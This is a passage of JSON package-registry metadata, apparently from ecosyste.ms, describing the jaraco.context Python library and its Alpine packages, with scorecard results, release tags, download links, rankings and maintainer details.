enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.666Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":25.58491517941603,"stargazers_count":19.713691114334363,"forks_count":19.448823863278047,"average":16.18685753925711},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.15","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":1917,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-02-19T23:52:45.816Z","updated_at":"2023-02-19T23:52:45.816Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.15","url":"https://pkgs.alpinelinux.org/packages?branch=v3.15","ecosystem":"alpine","default":false,"packages_count":15857,"maintainers_count":287,"namespaces_count":2,"keywords_count":2466,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":799},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.684Z","updated_at":"2026-08-24T05:06:01.591Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/namespaces"}},{"id":11765652,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_number":"6.0.1-r1","last_synced_at":"2026-07-24T20:02:39.138Z","created_at":"2025-06-07T18:25:44.400Z","updated_at":"2026-08-06T19:26:18.676Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"P